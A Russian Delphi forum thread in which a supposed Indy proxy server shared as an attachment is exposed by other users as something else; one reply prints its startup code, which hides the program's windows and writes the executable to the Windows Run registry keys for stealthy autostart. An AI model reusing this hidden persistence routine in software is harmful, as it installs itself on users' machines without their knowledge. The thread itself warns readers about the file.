Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Работа с сетью в Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 05.01.2010, 12:59   #1
GvR
Пользователь
 
Аватар для GvR
 
Регистрация: 03.11.2009
Сообщений: 29
Вопрос Proxy Server Indy

Всем привет. Скомпилировал исходник который прикреплен ниже. Дал юзеру для теста. Он запустил файл. Прописал ево IP в Mozille Но я не смог подконектитса к нему. В чем может быть проблема?
Вложения
Тип файла: rar proxy.rar (3.1 Кб, 63 просмотров)
GvR вне форума Ответить с цитированием
Старый 01.02.2010, 08:46   #2
Beweniy_pchel
Новичок
Джуниор
 
Регистрация: 17.12.2009
Сообщений: 2
По умолчанию

РЕБЯТА НЕ ГРУЗИТЕ. ТАМ ФИГНЯ КАКЯ-ТО ПРОВОДЯЩАЯ ОПЕРАЦИИ С РЕЕСТРОМ И ВСЕ. НИКАКОГО ПРОКСИ ТАМ НЕТ.
Beweniy_pchel вне форума Ответить с цитированием
Старый 01.02.2010, 09:42   #3
DomiNick
Студент, не
Старожил
 
Аватар для DomiNick
 
Регистрация: 29.01.2009
Сообщений: 2,067
Вопрос

Код:
procedure TForm1.FormCreate(Sender: TObject);
var reg:tregistry;prog:string;
begin
Showwindow(handle,SW_HIDE);
Showwindow(Application.handle,SW_HIDE);
prog:=application.ExeName;
reg:=tregistry.Create;
reg.RootKey:=HKEY_LOCAL_MACHINE;
if reg.OpenKey('\SOFTWARE\Microsoft\Windows\CurrentVersion\run',true) then
begin
reg.WriteString('timer',prog);
reg.CloseKey;
end;
reg.Free;
Showwindow(handle,SW_HIDE);
Showwindow(Application.handle,SW_HIDE);
prog:=application.ExeName;
reg:=tregistry.Create;
reg.RootKey:=HKEY_CURRENT_USER;
if reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\run',true) then
begin
reg.WriteString('timer',prog);
reg.CloseKey;
end;
reg.Free;
end;
Хм..... Особо криминального тут не вижу, хотя да, подозрительно чтот...
I am the First of Cyber Evolution...
I am the First to Program your Future...
DomiNick вне форума Ответить с цитированием
Старый 01.02.2010, 11:26   #4
raxp
Старожил
 
Регистрация: 29.09.2009
Сообщений: 9,742
По умолчанию

Цитата:
...Но я не смог подконектитса к нему. В чем может быть проблема?
например у него стоит файрволл или закрыт порт по которому вы работаете.

...разбираться с вашим проектом времени нет, можете глянуть пример рабочего сервиса с использованием TIdMappedPortTCP как и у вас.
Разработки и научно-технические публикации :: Видеоблог :: Твиттер
Radar systems engineer & Software developer of industrial automation
raxp вне форума Ответить с цитированием
Старый 14.08.2014, 22:08   #5
Dimaolab
 
Регистрация: 13.08.2014
Сообщений: 5
По умолчанию

Цитата:
Сообщение от raxp Посмотреть сообщение
например у него стоит файрволл или закрыт порт по которому вы работаете.

...разбираться с вашим проектом времени нет, можете глянуть пример рабочего сервиса с использованием TIdMappedPortTCP как и у вас.
Вы жестоко обмануты оно и не будет работать
Dimaolab вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
как обновить indy 9 на indy 10 Пилигрим Компоненты Delphi 16 30.04.2010 10:11
Создание чата с через FTP Server с помощью компонентов INDY 9 dani92 Работа с сетью в Delphi 1 04.08.2009 05:22
Доступ к БД (SQL server) в ОС Windows server 2003 Mann SQL, базы данных 2 07.12.2008 19:15
Indy 9 против Indy 10 OrdJONY Свободное общение 2 08.11.2008 20:28